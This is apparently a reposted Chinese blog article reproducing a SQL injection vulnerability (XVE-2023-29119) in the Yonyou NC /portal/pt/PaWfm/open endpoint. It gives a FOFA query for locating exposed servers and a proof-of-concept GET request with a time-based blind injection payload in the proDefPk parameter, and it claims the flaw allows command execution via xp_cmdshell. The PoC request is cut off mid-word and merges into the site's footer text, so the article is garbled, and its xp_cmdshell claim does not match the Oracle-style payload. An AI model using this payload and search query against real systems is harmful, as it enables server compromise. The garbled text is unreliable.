本文主要是介绍用友NC open SQL注入漏洞复现(XVE-2023-29119),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。这一系列产品基于全球最新的互联网技术、云计算技术和移动应用技术,旨在帮助企业创新管理模式、引领商业变革。
0x02 漏洞概述
用友NC /portal/pt/PaWfm/open接口的proDefPK参数存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
0x03 影响范围
用友网络科技股份有限公司-NC version<=6.5
0x04 复现环境
FOFA:
icon_hash="1085941792" && body="/logo/images/logo.gif"
0x05 漏洞复现
PoC
GET /portal/pt/PaWfm/open?pageId=login&proDefPk=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozill这篇关于用友NC open SQL注入漏洞复现(XVE-2023-29119)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
